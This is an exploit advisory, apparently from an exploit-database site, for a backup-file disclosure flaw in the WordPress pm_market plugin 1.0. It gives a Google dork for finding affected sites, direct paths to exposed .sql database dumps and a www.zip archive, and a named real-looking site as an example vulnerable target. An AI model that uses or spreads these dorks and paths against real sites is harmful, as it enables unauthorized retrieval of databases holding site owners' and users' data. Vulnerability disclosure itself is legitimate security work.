WordPress pm_market plugin version 1.0 suffers from a database backup disclosure vulnerability.
49057b9856f52e7c1326bb6a40eec2adce2781ea4cc9af44a1dd3056fcc88fb0
#################################################################################################
# Exploit Title : WordPress pm_market Plugins 1.0 Database Backup
Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 30/11/2018
# Vendor Homepage : wordpress.org ~ power.com.pl
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.0
# Google Dorks : inurl:''/wp-content/plugins/pm_market/backup/''
+ intext:Copyright A(c) Power Media S.A. site:pl
# Exploit Risk : Medium
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/pm_market/backup/....
/wp-content/plugins/pm_market/backup/[YEAR]-[MONTH]-[DAY]/pm_market.sql
/wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql
/wp-content/plugins/pm_market/backup/2012-01-05/wordpress.sql
/wp-content/plugins/pm_market/backup/2012-01-05/www.zip
#################################################################################################
# Example Vulnerable Site =>
[+]
klaster.kalisz.pl/wp-content/plugins/pm_market/backup/2012-01-05/pm_market.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################